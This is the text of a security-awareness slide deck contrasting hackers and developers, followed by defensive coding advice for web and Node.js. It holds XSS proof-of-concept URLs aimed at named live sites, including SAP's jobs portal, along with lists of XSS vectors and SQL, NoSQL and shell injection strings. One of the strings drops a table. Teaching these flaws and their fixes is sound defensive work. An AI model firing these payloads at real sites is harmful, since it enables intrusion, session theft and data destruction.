Soumyasanto Sen, #sitWDF
Hackers versus Developers
The GAME is ON
Introduction
Player 1: Hackers
Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply.
Unsocial: Don’t want to come out of the shell.
Breaker: Hack apps.
Cool: People think that they are cool and they think they are awesome.
Super Power: They believe that they can be "Masters of the Universe".
VS
Player 2: Developers
Controller: Can use a lot of systems and languages and get them to talk to each other.
Social: True and broad professionals, work with people and communicate well.
Builder: Create apps.
Boring: There are other more important things in life than just coding.
Super Power: They believe they can change this world.
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript's built-in function(s)
decodeURI: decodes an encoded URI
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xxxxxxxx'yyyyy</img
Possibilities:
• '-confirm(1)-'
• '-confirm`1`-'
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-confirm(1)-'
Resulting inline script (the parameter lands inside the string literal):
var topic = decodeURI('');confirm(1);('');
var topic = decodeURI('');confirm(1);//');
JavaScript's built-in function(s)
replace (JS String replace method): returns a new string with a matched pattern replaced
http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img
Possibilities:
http://www.zaobao.com.sg/search/site/"-confirm(1)-"
http://www.zaobao.com.sg/search/site/");confirm(1);("
http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
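Both cases above share one root cause: a URL parameter is concatenated into a string literal inside an inline script. The following is an added example, not code from the slides or from either site; `renderTopicVulnerable()` mirrors the `var topic = decodeURI('...')` pattern, and the encoder and helper names are ours.

```javascript
// Added example, not from the slides: how the ?topic= value ends up inside an
// inline <script> string literal, and an encoder that keeps it there.
// renderTopicVulnerable() mirrors the pattern behind the slide's
// var topic = decodeURI('...') line; everything else here is our own.

// Vulnerable: the raw parameter is concatenated between single quotes, so a
// quote in the input terminates the literal and the rest is parsed as code.
function renderTopicVulnerable(topic) {
  return "var topic = decodeURI('" + topic + "');";
}

// Hardened encoder for the "inside a JS string literal inside <script>" context.
// JSON.stringify escapes the quote and backslash; the extra replacements cover
// what the HTML parser sees first (a literal </script> would end the element
// before JS ever runs) and the two line terminators JSON leaves unescaped.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderTopicSafe(topic) {
  return "var topic = " + toJsStringLiteral(topic) + ";";
}

// Self-check of the encoder only: evaluate the generated statement and confirm
// the original value comes back unchanged. Evaluating generated code is fine
// in a unit test of the encoder; it is not something to do with request data.
function roundTrip(topic) {
  return new Function(renderTopicSafe(topic) + " return topic;")();
}

// Constructed inputs: the payloads the slides use against the two sites.
const PAYLOADS = [
  "'-confirm(1)-'",
  "');confirm(1);//",
  '"-confirm(1)-"',
  "</script><script>alert(1)</script>",
];

// A statement is intact when it still has the shape
//   var topic = "<one JSON string literal>";
// with no "</" left over for the HTML parser, and the value round-trips.
function literalStaysIntact(topic) {
  const out = renderTopicSafe(topic);
  return /^var topic = "(?:[^"\\]|\\.)*";$/.test(out) &&
    !out.includes("</") &&
    roundTrip(topic) === String(topic);
}
```

Filtering `//` or `'` one at a time, as the sites above did, leaves the other breakout characters in play; encoding for the exact output context closes all of them at once.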
Easy Rules
Preventions
• XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
• HTML5 Security Cheat Sheet
• Secure Coding Practice Guidelines
• Use clean URLs: https://www.site.com/news.php?id=1337 is far more tempting to an attacker than https://www.site.com/news/some-news-or-today
• Sanitize inputs: a must for XSS
• Control access: http://www.site.com/phpmyadmin gave us access to the complete database! No injection, nothing
• Validate input.
• Use white-listing.
• Switch off error display.
Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
(Developers love their code, just like it's their child.)
“Do not trust anything ever, especially when it comes to user input.”
“Security is about layers. It has to be because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION.
Hacking looks ‘Simple’, even for SAP SuccessFactors
Breaking SuccessFactors' XSS Filter
'-confirm(1)-' was enough to break SAP SuccessFactors' XSS filter and made hundreds of web applications vulnerable ...
https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img
Possibilities:
• </script><script>alert(1)</script>
• '-confirm(1)-'
https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script>
Next Vector: <img src=x onerror=alert(1)>
Next Vector: <img src=x onerror=confirm(1)>
Next Vector: <a href=javascript:confirm(1)>click</a>
Next Vectors:
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via URL-valued attributes, e.g. an img's src and/or an anchor's href: implementation of `urlContextCleaner()`.
External HTML Sanitizer
https://developers.google.com/caja/
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
// URL policy: keep only http(s) URLs; returning undefined drops the attribute
function urlX(url) { if (/^https?:\/\//.test(url)) { return url } }
// id/name policy: pass ids through unchanged
function idX(id) { return id }
// "<\/script>" keeps the string literal from closing this script element
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX))
</script>
Hacking in Node.js
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine.
Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs:
<s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s>
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
(with any encoding)
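The `urlContextCleaner()` named on the Context Based Filtering slide and the mangled javascript: URI just above come down to the same check: normalise the value the way a browser will, then allow-list the scheme. The code below is an added example, not the slide author's implementation; the function name is taken from the slide, the allow-list and the entity decoder are our own choices.

```javascript
// Added example, not from the slides: a minimal urlContextCleaner() for
// attributes that take a URL (img src, a href). Allow-list approach: only
// http, https, mailto and relative URLs survive; anything else becomes "".

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode numeric entities and the few named ones that matter for a scheme,
// so "&#106;avascript:" or "javascript&colon;" is seen for what it is.
function decodeEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
                  tab: "\t", newline: "\n", colon: ":" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const key = body.toLowerCase();
    return key in named ? named[key] : m;
  });
}

function urlContextCleaner(rawUrl) {
  if (typeof rawUrl !== "string") return "";
  // Browsers drop tab/newline anywhere and leading/trailing C0 controls and
  // spaces before parsing a URL, so normalise the same way before inspecting.
  const url = decodeEntities(rawUrl)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  // A scheme, if present, is everything before the first ":" that comes
  // before any "/", "?" or "#". Characters that cannot belong to a scheme are
  // stripped before the comparison, so "javascriptJ a V a S c R iPt:" is still
  // judged as a scheme and not mistaken for a relative path.
  const cut = url.search(/[/?#]/);
  const head = cut === -1 ? url : url.slice(0, cut);
  const colon = head.indexOf(":");
  if (colon === -1) return url; // no scheme: a relative URL
  const scheme = head.slice(0, colon).replace(/[^a-z0-9+.-]/gi, "").toLowerCase();
  return ALLOWED_SCHEMES.has(scheme) ? url : "";
}
```

The returned value is decoded text, so it must still be attribute-encoded when written back into HTML; a relative path containing a colon in its first segment is rejected by design.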
Server Side JavaScript Injection
Simple JS command (reaching a server-side eval()):
response.end("Ended Response");
User input handed to a shell, as seen in strace (output truncated):
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1--' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(user = Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}); (NoSQL)
{ "username": {"$gt": ""},
  "password": {"$gt": ""} }
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML:
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Replace eval() with JSON.parse(); the code is then no longer injectable
• Use child_process.execFile or child_process.spawn instead of child_process.exec
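The two SSJSI fixes above, shown next to the patterns they replace (the `response.end(...)` payload and the `/bin/sh -c` strace line from the Hacking in Node.js slide). This is an added example, not code from the slides; the function names and the request bodies are ours.

```javascript
// Added example, not from the slides: the two SSJSI fixes from the protection
// slide next to the patterns they replace. Request bodies are constructed
// inputs; nothing here spawns a process, so the functions can be unit-tested.

// Before: eval("(" + body + ")") would run response.end("Ended Response") or
// anything else the client sends. After: JSON.parse only ever produces data,
// and the shape is checked before use, so code or a non-object is rejected.
function parseBody(body) {
  let value;
  try {
    value = JSON.parse(body);
  } catch (err) {
    return { ok: false, error: "body is not valid JSON" };
  }
  if (value === null || typeof value !== "object" || Array.isArray(value)) {
    return { ok: false, error: "body must be a JSON object" };
  }
  return { ok: true, value };
}

// Before: child_process.exec("ls -l " + userInput) hands one string to
// /bin/sh -c, which is exactly the execve("/bin/sh", ["/bin/sh", "-c", ...])
// line in the strace on the earlier slide; shell metacharacters are interpreted.
function shellCommandVulnerable(userInput) {
  return "ls -l " + userInput;
}

// After: build an argv for child_process.execFile / spawn. No shell is
// involved, the input stays a single argument however many ";" or "|" it
// holds, and "--" stops ls from reading a leading "-" in the input as an option.
function buildListing(userInput) {
  if (typeof userInput !== "string" || userInput.includes("\0")) {
    throw new TypeError("path must be a string without NUL bytes");
  }
  return { file: "ls", args: ["-l", "--", userInput] };
}

// Wiring for a real handler (not exercised by the test): execFile with the
// argv above. The callback receives the listing or the error; nothing is eval'd.
function runListing(userInput, callback) {
  const { file, args } = buildListing(userInput);
  require("child_process").execFile(file, args, { timeout: 5000 }, callback);
}
```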
SQL and NoSQL Injection Prevention
• Use parameterized SQL
var q = 'SELECT name FROM books WHERE id = $1';
client.query(q, ['3'], function(err, result) {});
• PreparedStatements prevent SQL injection
PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL)
db.users.find({user: { $in: [user] }, pass: { $in: [pass] }});
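The NoSQL case from the two slides above, worked through without a database: the functions return the filter object `db.users.find()` would receive, so the operator injection and both defences (a type check and the slide's `$in` wrapper) can be inspected directly. This is an added example, not the slide author's code; all names and the sample bodies are ours.

```javascript
// Added example, not from the slides: the login lookup with the
// operator-injection problem and two defences. No database is needed;
// each builder returns the filter that would be passed to db.users.find().
// (Looking a password up by equality implies plaintext storage; it is kept
// only because the slide's query does it. Real code compares a hash.)

// Vulnerable: body fields are forwarded as-is, so a parsed JSON object such
// as {"$gt": ""} reaches the driver and is interpreted as a query operator.
function buildLoginFilterVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Detection: does user-supplied data contain any key starting with "$"?
// Useful as a request-level check or a log signal, independent of the query.
function hasQueryOperator(value) {
  if (Array.isArray(value)) return value.some(hasQueryOperator);
  if (value !== null && typeof value === "object") {
    return Object.keys(value).some((k) => k.startsWith("$") || hasQueryOperator(value[k]));
  }
  return false;
}

// Defence 1 (type check): only primitive strings may reach the query.
function requireString(value, field) {
  if (typeof value !== "string") throw new TypeError(field + " must be a string");
  return value;
}
function buildLoginFilter(body) {
  return {
    username: requireString(body.username, "username"),
    password: requireString(body.password, "password"),
  };
}

// Defence 2 (the slide's $in wrapper): $in compares against array members,
// so an object inside the array is matched as a literal sub-document rather
// than interpreted as an operator. Combine it with the type check anyway.
function buildLoginFilterIn(body) {
  return {
    username: { $in: [body.username] },
    password: { $in: [body.password] },
  };
}
```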
Good Cause
Positive Side
• Social Good: finding solutions for social benefit, operations and emergencies
• Penetration Testing: finding vulnerabilities that an attacker could exploit
• Open Source: much open-source code is produced, tested and improved by hackers, often at hackathons
Negative Side
Top 10 fears of 2015 (Source: Chapman University)
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Make a Difference
Source: Scott Hanselman
Who is the Winner?
A "Hacker" is a state of mind.
A "Developer" is a state of function.
Choice is Yours
Thank You
Soumyasanto Sen
@soumyasanto
